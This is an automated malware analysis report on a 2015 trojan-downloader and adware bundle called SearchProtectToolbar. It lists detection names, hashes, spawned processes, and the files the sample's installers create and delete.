SearchProtectToolbar_pcap_5108469d6a

by malwarelabrobot on April 24th, 2015 in Malware Descriptions.

Trojan-Downloader.NSIS.Adload.bs (Kaspersky), Installer.Win32.InnoSetup.2.FD, Trojan.NSIS.StartPage.FD, Trojan.Win32.Delphi.FD, Trojan.Win32.Sasfis.FD, VirTool.Win32.DelfInject.FD, SearchProtectToolbar_pcap.YR, mzpefinder_pcap_file.YR, SearchProtectToolbar.YR (Lavasoft MAS)
Behaviour: Trojan-Downloader, Trojan, Installer, VirTool


This description has been generated automatically by the Lavasoft Malware Analysis System and may contain incomplete or inaccurate information.


MD5: 5108469d6aedae76348b6e88ba3e8a65
SHA1: 2004a3616720384de308cec8c31ca91ec824821b
SHA256: 3c57d2e68ac69215ca6c80560b70b90cfdada8461094451d1584aa810e394833
SSDeep: 1536:mQpQ5EP0ijnRTXJOG5ZRr2CEU5170WC3/88fojRhAaS2Wib9xeNhS:mQIURTXJOG5ZRr2Cn550W88R1Bb9gNk
Size: 71088 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6
Company: no certificate found
Created at: 2009-12-06 00:50:46
Analyzed on: WindowsXP SP3 32-bit


Summary:

Trojan-Downloader: a Trojan program that downloads files from the Internet without the user's knowledge and executes them.

Payload

No specific payload has been found.

Process activity

The Trojan creates the following process(es):

q2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2N_nj.exe:392
net1.exe:976
net1.exe:2596
net1.exe:2220
net1.exe:2588
q2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2N_ps.exe:1196
310714_is.tmp:1388
ProtectService.exe:3496
ProtectService.exe:3676
ProtectService.exe:3468
XTab_Setup2121.exe:3372
wpm_v20.0.0.1953_0302.exe:3104
q2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2N_gs.exe:248
net.exe:2552
net.exe:1808
net.exe:2556
net.exe:400
QQBrowser.exe:2908
QQBrowser.exe:2216
q2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2N_cr.exe:660
HPNotify.exe:3664
ActSys.exe:2440
q2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2N_br.exe:628
cmdshell.exe:3548
amisetup5755__9664.exe:1532
nfregdrv.exe:976
nfregdrv.exe:1540
q2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2N_a9.exe:452
CashReminder.exe:596
sc.exe:3420
sc.exe:3396
GOSafer.exe:2464
GOSafer.exe:2604
WNet.exe:256
310714_is.exe:1880
q2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2N_am2.exe:1180

The Trojan injects its code into the following process(es):

q2g54WndLShXYB3BIA5JVfobjOB2N_mb_1.exe:1316
ActSys.exe:2648
%original file name%.exe:1396
CashReminder.exe:1232
WNet.exe:2284

Mutexes

The following mutexes were created/opened:
No objects were found.

File activity

The process q2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2N_nj.exe:392 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\ActSys\SSL\import_root_cert.exe (3312 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ActSys\SSL\nss\certutil.exe (3312 bytes)
%Program Files%\ActSys\ActSys.exe (15536 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ActSys\SSL\import.bat (66 bytes)
%Program Files%\ActSys\asfilterdrv.sys (1856 bytes)
%System%\drivers\asfilterdrv.sys (56 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ActSys\SSL\nss\nspr4.dll (6360 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nso15.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ActSys\SSL\nss\nss3.dll (12536 bytes)
%Program Files%\ActSys\remove_ActSys.exe (825 bytes)
%Program Files%\ActSys\ssleay32.dll (12088 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nso15.tmp\SelfDel.dll (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ActSys\SSL\nss\plds4.dll (784 bytes)
%Program Files%\ActSys\nfapi.dll (4992 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ActSys\SSL\nss\plc4.dll (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ActSys\SSL\nss (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nso15.tmp\nsExec.dll (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ActSys\SSL\nss\mozcrt19.dll (23936 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ActSys\SSL\nss\softokn3.dll (12536 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ActSys\SSL\nss\smime3.dll (3616 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ActSys\SSL\NJaxSSL.cer (780 bytes)
%Program Files%\ActSys\libeay32.dll (35507 bytes)
%Program Files%\ActSys\nfregdrv.exe (1552 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nso15.tmp\SimpleSC.dll (1856 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsv13.tmp (130190 bytes)
%Program Files%\ActSys\ProtocolFilters.dll (35001 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nso15.tmp\ns19.tmp (6 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\ActSys\SSL\nss\plds4.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ActSys\SSL\nss\plc4.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nso15.tmp\SimpleSC.dll (0 bytes)
%Program Files%\ActSys\asfilterdrv.sys (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ActSys\SSL\nss (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nso15.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ActSys\SSL\import_root_cert.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ActSys\SSL\nss\certutil.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ActSys\SSL\nss\nspr4.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ActSys\SSL\nss\softokn3.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nso15.tmp\nsExec.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ActSys\SSL (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nso15.tmp\System.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ActSys\SSL\nss\mozcrt19.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ActSys\SSL\import.bat (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ActSys\SSL\nss\nss3.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa12.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ActSys\SSL\NJaxSSL.cer (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nso15.tmp\SelfDel.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nso15.tmp\ns19.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ActSys\SSL\nss\smime3.dll (0 bytes)

The process q2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2N_ps.exe:1196 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\Plain Savings\mj (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsfB.tmp\inetc.dll (20 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsfB.tmp\ns14.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Plain Savings\tlg (41 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Plain Savings\lm (128 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsfB.tmp\IpConfig.dll (4136 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsfB.tmp\NSISEncrypt.dll (3185 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsfB.tmp\UserInfo.dll (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsfB.tmp\ns11.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsfB.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsfB.tmp\nsJSON.dll (7 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsfB.tmp\nsExec.dll (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsfB.tmp\WmiInspector.dll (3039 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsfB.tmp (4 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsfB.tmp\UserInfo.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Plain Savings\mj (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Plain Savings\tlg (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsfB.tmp\System.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Plain Savings\lm (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsfB.tmp\IpConfig.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsfB.tmp\inetc.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nskA.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsfB.tmp\ns14.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsfB.tmp\WmiInspector.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsfB.tmp\NSISEncrypt.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsfB.tmp\nsJSON.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsfB.tmp\nsExec.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Plain Savings (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsfB.tmp\ns11.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsfB.tmp (0 bytes)

The process q2g54WndLShXYB3BIA5JVfobjOB2N_mb_1.exe:1316 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\AHGJU1UT\MobiMidia_validation[1].js (961 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4TI7KL2V\verificar_ip[1].php (24 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\85E349A7\310113f8[1].htm (707 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4TI7KL2V\i[1].gif (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl5.tmp (12 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\KPERCTIR\verificar_ip[1].htm (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\85E349A7\010914i[1].htm (734 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\AHGJU1UT\s9[1].gif (43 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4TI7KL2V\icone_cadeado[1].gif (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\AHGJU1UT\carregando[1].gif (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsq6.tmp\nsWeb.dll (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\AHGJU1UT\310113f8[1].htm (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\AHGJU1UT\010914i[1].htm (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\KPERCTIR\mt-core[1].js (55269 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\KPERCTIR\top-line[1].gif (1 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsq6.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\AHGJU1UT\s9[1].gif (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl4.tmp (0 bytes)

The process XTab_Setup2121.exe:3372 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Program Files%\XTab\web\_locales\es-ES\messages.json (3 bytes)
%Program Files%\XTab\web\_locales\pt\messages.json (4 bytes)
%Program Files%\XTab\searchProvider.xml (8 bytes)
%Program Files%\XTab\web\_locales\zh-CN\messages.json (3 bytes)
%Program Files%\XTab\web\_locales\fr-BE\messages.json (3 bytes)
%Program Files%\XTab\web\_locales\pl\messages.json (3 bytes)
%Program Files%\XTab\web\ver.txt (47 bytes)
%Program Files%\XTab\web\img\icon128.png (9 bytes)
%Program Files%\XTab\web\_locales\vi-VI\messages.json (4 bytes)
%Program Files%\XTab\web\_locales\es-419\messages.json (3 bytes)
%Program Files%\XTab\skin\input_bk.png (2 bytes)
%Program Files%\XTab\web\_locales\ru\messages.json (4 bytes)
%Program Files%\XTab\CmdShell.exe (1685 bytes)
%Program Files%\XTab\BrowerWatchCH.dll (23 bytes)
%Program Files%\XTab\web\_locales\fr-FR\messages.json (3 bytes)
%Program Files%\XTab\skin\logo.png (5 bytes)
%Program Files%\XTab\web\js\jquery-1.11.0.min.js (4726 bytes)
%Program Files%\XTab\web\_locales\zh-TW\messages.json (3 bytes)
%Program Files%\XTab\web\_locales\en-US\messages.json (3 bytes)
%Program Files%\XTab\web\_locales\fr-LU\messages.json (3 bytes)
%Program Files%\XTab\web\js\common.js (2 bytes)
%Program Files%\XTab\web\_locales\it-IT\messages.json (4 bytes)
%Program Files%\XTab\skin\conf.xml (8 bytes)
%Program Files%\XTab\skin\btn.png (2 bytes)
%Program Files%\XTab\skin\conf_back.png (1623 bytes)
%Program Files%\XTab\web\js\library.js (4216 bytes)
%Program Files%\XTab\web\_locales\tr-TR\messages.json (4 bytes)
%Program Files%\XTab\install.data (93 bytes)
%Program Files%\XTab\skin\rigth_arrow.png (2 bytes)
%Program Files%\XTab\uninstall.exe (1343 bytes)
%Program Files%\XTab\web\img\google_trends.png (7 bytes)
%Program Files%\XTab\web\data.html (20 bytes)
%Program Files%\XTab\IeWatchDog.dll (20 bytes)
%Program Files%\XTab\skin\radio_2.png (3 bytes)
%Program Files%\XTab\web\js\ga.js (1568 bytes)
%Program Files%\XTab\ffsearch_toolbar!1.0.0.1028.xpi (15 bytes)
%Program Files%\XTab\web\js\jquery.autocomplete.js (12 bytes)
%Program Files%\XTab\web\js\xagainit2.0.js (4 bytes)
%Program Files%\XTab\web\_locales\pt-BR\messages.json (4 bytes)
%Program Files%\XTab\web\_locales\it-CH\messages.json (3 bytes)
%Program Files%\XTab\skin\radio_1.png (3 bytes)
%Program Files%\XTab\msvcp110.dll (16990 bytes)
%Program Files%\XTab\web\_locales\fr-CA\messages.json (3 bytes)
%Program Files%\XTab\web\indexIE.html (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm1C.tmp\System.dll (11 bytes)
%Program Files%\XTab\web\indexIE8.html (1794 bytes)
%Program Files%\XTab\web\_locales\ru-MO\messages.json (4 bytes)
%Program Files%\XTab\web\img\icon48.png (3 bytes)
%Program Files%\XTab\skin\close.png (3 bytes)
%Program Files%\XTab\skin\about.png (4 bytes)
%Program Files%\XTab\web\js\js.js (18 bytes)
%Program Files%\XTab\skin\settings.png (5 bytes)
%Program Files%\XTab\web\img\icon16.png (628 bytes)
%Program Files%\XTab\skin\about_bk.png (1436 bytes)
%Program Files%\XTab\SupTab.dll (15406 bytes)
%Program Files%\XTab\web\js\xagainit-ie8.js (4 bytes)
%Program Files%\XTab\msvcr110.dll (21280 bytes)
%Program Files%\XTab\ProtectService.exe (5309 bytes)
%Program Files%\XTab\skin\main.xml (4 bytes)
%Program Files%\XTab\web\main.css (19 bytes)
%Program Files%\XTab\HPNotify.exe (17941 bytes)
%Program Files%\XTab\conf (1694 bytes)
%Program Files%\XTab\web\img\loading.gif (5 bytes)
%Program Files%\XTab\skin\btn_apply.png (6 bytes)
%Program Files%\XTab\web\img\logo32.ico (4 bytes)
%Program Files%\XTab\BrowserAction.dll (33992 bytes)
%Program Files%\XTab\web\_locales\fr-CH\messages.json (3 bytes)
%Program Files%\XTab\BrowerWatchFF.dll (23 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsm1C.tmp\System.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsb1B.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm1C.tmp (0 bytes)

The process q2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2N_gs.exe:248 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsm18.tmp\SimpleSC.dll (1856 bytes)
%Program Files%\GOSafer\nfregdrv.exe (1552 bytes)
%Program Files%\GOSafer\gosafer.exe (15536 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsg17.tmp (66910 bytes)
%System%\drivers\gosaferdrv.sys (55 bytes)
%Program Files%\GOSafer\uninst.exe (1793 bytes)
%Program Files%\GOSafer\ProtocolFilters.dll (9320 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm18.tmp\SelfDel.dll (5 bytes)
%Program Files%\GOSafer\libeay32.dll (35507 bytes)
%Program Files%\GOSafer\ssleay32.dll (12088 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm18.tmp\System.dll (11 bytes)
%Program Files%\GOSafer\nfapi.dll (4992 bytes)
%Program Files%\GOSafer\gosaferdrv.sys (1856 bytes)

The Trojan deletes the following file(s):

%Program Files%\GOSafer\gosaferdrv.sys (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm18.tmp\SimpleSC.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa16.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm18.tmp\SelfDel.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm18.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm18.tmp\System.dll (0 bytes)

The process QQBrowser.exe:2908 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\tmp\wpm_v20.0.0.1953_0302.exe (3566 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\tmp\XTab_Setup2121.exe (17629 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\tmp\479.db (190 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\WebDataJs (40 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\tmp\wpm_v20.0.0.1953_0302.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\tmp\XTab_Setup2121.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\DataBase (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\tmp\479.db (0 bytes)

The process QQBrowser.exe:2216 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Application Data\istartsurf\images\bg1.png (2 bytes)
%Documents and Settings%\%current user%\Application Data\istartsurf\images\Thumbs.db (27 bytes)
%Documents and Settings%\%current user%\Application Data\istartsurf\UninstallManager.exe (14022 bytes)
%Documents and Settings%\%current user%\Application Data\istartsurf\uninstallDlg2.xml (15 bytes)
%Documents and Settings%\%current user%\Application Data\istartsurf\images\code\code1.jpg (5 bytes)
%Documents and Settings%\%current user%\Application Data\istartsurf\images\loading_light.png (139 bytes)
%Documents and Settings%\%current user%\Application Data\istartsurf\images\code\code4.jpg (5 bytes)
%Documents and Settings%\%current user%\Application Data\istartsurf\479.json (512 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\Internet Explorer\Quick Launch\Launch Internet Explorer Browser.lnk (1 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\Internet Explorer.lnk (993 bytes)
%Documents and Settings%\%current user%\Application Data\istartsurf\images\code\code5.jpg (4 bytes)
%Documents and Settings%\%current user%\Application Data\istartsurf\images\code\code3.jpg (5 bytes)
%Documents and Settings%\%current user%\Application Data\istartsurf\images\bk_shadow.png (3 bytes)
%Documents and Settings%\%current user%\Application Data\istartsurf\images\code\Thumbs.db (42 bytes)
%Documents and Settings%\%current user%\Application Data\istartsurf\MessageBox.xml (3 bytes)
%Documents and Settings%\%current user%\Application Data\istartsurf\images\button1.png (1 bytes)
%Documents and Settings%\%current user%\Application Data\istartsurf\images\loading_bg.png (159 bytes)
%Documents and Settings%\%current user%\Application Data\istartsurf\images\scrollbar.bmp (37 bytes)
%Documents and Settings%\%current user%\Application Data\istartsurf\images\checked.png (222 bytes)
%Documents and Settings%\%current user%\Application Data\istartsurf\images\checkbox_select.png (783 bytes)
%Documents and Settings%\%current user%\Application Data\istartsurf\images\unchecked.png (135 bytes)
%Documents and Settings%\%current user%\Application Data\istartsurf\images\code\code6.jpg (5 bytes)
%Documents and Settings%\%current user%\Application Data\istartsurf\images\close.png (3 bytes)
%Documents and Settings%\%current user%\Application Data\istartsurf\images\code\code2.jpg (4 bytes)
%Documents and Settings%\%current user%\Application Data\istartsurf\images\min.png (1 bytes)
%Documents and Settings%\%current user%\Application Data\istartsurf\images\checkbox.png (545 bytes)
%Documents and Settings%\%current user%\Application Data\istartsurf\images\button.png (3 bytes)
%Documents and Settings%\%current user%\Application Data\istartsurf\images\bg.png (673 bytes)

The process q2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2N_cr.exe:660 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Program Files%\CashReminder\ssleay32.dll (12088 bytes)
%Program Files%\CashReminder\nfapi.dll (4992 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw9.tmp\System.dll (11 bytes)
%System%\drivers\crfilterdrv.sys (55 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsg8.tmp (67341 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw9.tmp\SelfDel.dll (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw9.tmp\SimpleSC.dll (1856 bytes)
%Program Files%\CashReminder\libeay32.dll (35507 bytes)
%Program Files%\CashReminder\uninstall.exe (1568 bytes)
%Program Files%\CashReminder\nfregdrv.exe (1552 bytes)
%Program Files%\CashReminder\CashReminder.exe (15536 bytes)
%Program Files%\CashReminder\crfilterdrv.sys (1856 bytes)
%Program Files%\CashReminder\ProtocolFilters.dll (9320 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsw9.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw9.tmp\System.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw9.tmp\SelfDel.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw9.tmp\SimpleSC.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsq7.tmp (0 bytes)
%Program Files%\CashReminder\crfilterdrv.sys (0 bytes)

The process HPNotify.exe:3664 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Program Files%\XTab\conf (1630 bytes)

The process ActSys.exe:2648 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%WinDir%\Temp\ActSys\SSL\NJax Intermediate SSL.cer (782 bytes)
%WinDir%\Temp\P_RuleList.txt (180 bytes)
%WinDir%\Temp\ActSys\SSL\NJax Intermediate SSL.pvk (1 bytes)
%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\SRKX8H05\rules[1].txt (180 bytes)

The Trojan deletes the following file(s):

%WinDir%\Temp\P_RuleList.txt (0 bytes)

The process q2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2N_br.exe:628 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Program Files%\WNet\nfregdrv.exe (1552 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz10.tmp\SelfDel.dll (5 bytes)
%Program Files%\WNet\WNet.exe (15168 bytes)
%Program Files%\WNet\uninst.exe (1720 bytes)
%Program Files%\WNet\ssleay32.dll (12088 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsyF.tmp (68079 bytes)
%System%\drivers\ssfilterdrv.sys (55 bytes)
%Program Files%\WNet\ProtocolFilters.dll (9320 bytes)
%Program Files%\WNet\nfapi.dll (4992 bytes)
%Program Files%\WNet\libeay32.dll (35507 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz10.tmp\SimpleSC.dll (1856 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz10.tmp\System.dll (11 bytes)
%Program Files%\WNet\ssfilterdrv.sys (1856 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsz10.tmp\SelfDel.dll (0 bytes)
%Program Files%\WNet\ssfilterdrv.sys (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz10.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsdE.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz10.tmp\SimpleSC.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz10.tmp\System.dll (0 bytes)

The process cmdshell.exe:3548 makes changes in the file system.
The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\AHGJU1UT\rebirth[1].htm (0 bytes)

The process amisetup5755__9664.exe:1532 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\amipixel.cfg (107 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\KPERCTIR\index[1].htm (2203 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4TI7KL2V\amipb[1].js (34728 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\amitest.txt (27 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\amipixel.cfg (0 bytes)

The process %original file name%.exe:1396 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\85E349A7\310714_br[1].exe (64683 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst3.tmp\registry.dll (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4TI7KL2V\310714_am2[1].exe (20504 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\85E349A7\310714_cr[1] (64392 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\AHGJU1UT\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst3.tmp\nsWeb.dll (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4TI7KL2V\310714_gs[1] (64683 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temp\Oq2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2N\q2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2N_br.exe (64683 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4TI7KL2V\s9[1].gif (43 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temp\Oq2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2N\q2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2N_ps.exe (33816 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temp\Oq2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2N\q2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2N_nj.exe (110758 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\KPERCTIR\310714_is[1] (44832 bytes)
